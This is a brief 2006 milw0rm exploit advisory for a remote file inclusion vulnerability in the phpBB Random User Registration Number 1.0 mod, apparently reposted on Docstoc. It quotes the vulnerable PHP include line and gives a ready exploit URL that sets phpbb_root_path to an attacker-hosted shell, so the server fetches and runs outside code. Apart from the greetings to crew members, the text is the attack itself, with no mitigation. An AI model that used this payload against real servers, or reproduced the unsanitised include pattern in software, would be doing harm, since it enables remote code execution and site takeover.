phpBB Random User Registration Number 1.0 Mod Inclusion Vulnerability

Document Sample
phpBB Random User Registration Number 1.0 Mod Inclusion Vulnerability Powered By Docstoc
					                phpBB Random User Registration Number 1.0 Mod Inclusion Vulnerability                              Page 1/1
  1     − phpBB RANDOm USER REGISTRATION NUMBER 1.0 File Include Vulnerability
  2
  3     − bd0rk || SOH−Crew
  4
  5     − URL: http://www.nivisec.com/downloads/phpbb/random_image_register_v100.zip
  6
  7     − Code: include($phpbb_root_path . ’language/lang_’ . $board_config[’default_lang’] . ’/lang_random_num_reg.’ . $phpE
        x);
  8
  9     [+] Exploit: /includes/functions_num_image.php?phpbb_root_path=http://[target]/Shell?
  10
  11    Gr33tings: str0ke, TheJT, Lu7k, x0r_32
  12
  13    # milw0rm.com [2006−10−07]




bd0rk                                                                                                               10/07/2006

				
DOCUMENT INFO